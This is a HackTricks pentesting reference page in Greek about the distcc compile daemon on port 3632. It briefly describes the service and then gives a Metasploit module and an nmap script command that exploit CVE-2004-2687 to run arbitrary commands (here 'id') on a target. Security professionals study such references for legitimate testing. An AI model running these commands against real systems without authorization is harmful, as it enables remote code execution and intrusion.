hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.8 KiB
Raw Permalink Blame History

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Basic Information

Distcc είναι ένα εργαλείο που ενισχύει τη διαδικασία μεταγλώττισης χρησιμοποιώντας τη ανενεργή υπολογιστική ισχύ άλλων υπολογιστών στο δίκτυο. Όταν το distcc είναι ρυθμισμένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις εργασίες μεταγλώττισης σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί τον distccd daemon και να έχει εγκατεστημένο έναν συμβατό μεταγλωττιστή για να επεξεργαστεί τον αποσταλμένο κώδικα.

Default port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Εκμετάλλευση

Ελέγξτε αν είναι ευάλωτο σε CVE-2004-2687 για να εκτελέσετε αυθαίρετο κώδικα:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Δεν νομίζω ότι το shodan ανιχνεύει αυτή την υπηρεσία.

Resources

Post created by Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}